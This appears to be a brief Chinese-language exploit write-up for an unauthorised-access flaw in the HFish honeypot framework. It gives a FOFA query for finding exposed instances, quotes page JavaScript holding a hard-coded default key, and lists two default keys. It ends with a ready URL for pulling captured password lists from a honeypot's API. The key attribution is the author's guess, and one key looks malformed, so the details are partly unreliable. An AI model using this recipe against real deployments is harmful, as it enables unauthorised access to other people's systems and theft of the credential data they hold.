HFish未授权漏洞

HFish搜索方式

fofa搜索

app="HFish-扩展企业安全测试主动诱导型开源蜜罐框架系统"

利用过程分析

默认的官方部署的系统存在使用默认的KEY情况，在默认生成的蜜罐网站中存在的sec_key，可以直接进行获取相关的数据

`function report() {
var login_field = $("#user_login").val();
var password = $("#user_pass").val();

$.ajax({
    type: "POST",
    url: "/api/v1/post/deep_report",
    dataType: "json",
    data: {
        "name": "暗网钓鱼",
        "info": login_field + "&&" + password,
        "sec_key": "9cbf8a4dcb8e30682b927f352d6559a0"
    },
    success: function (e) {
        if (e.code == "200") {
            alert("账号密码错误");
        } else {
            console.log(e.msg)
        }
    },
    error: function (e) {
        console.log("fail")
    }
});

}
`
默认使用的key主要

X85e2ba265d965b1929148d0f0e33133
9cbf8a4dcb8e30682b927f352d6559a0

根据推断第一个KEY是用于上报数据，第二个key应该是获取蜜罐数据信息。

利用

可以直接通过相关蜜罐的接口获取蜜罐的数据信息
http://XXX.XXX.XXX.XXX:9001//api/v1/get/passwd_list?key=X85e2ba265d965b1929148d0f0e33133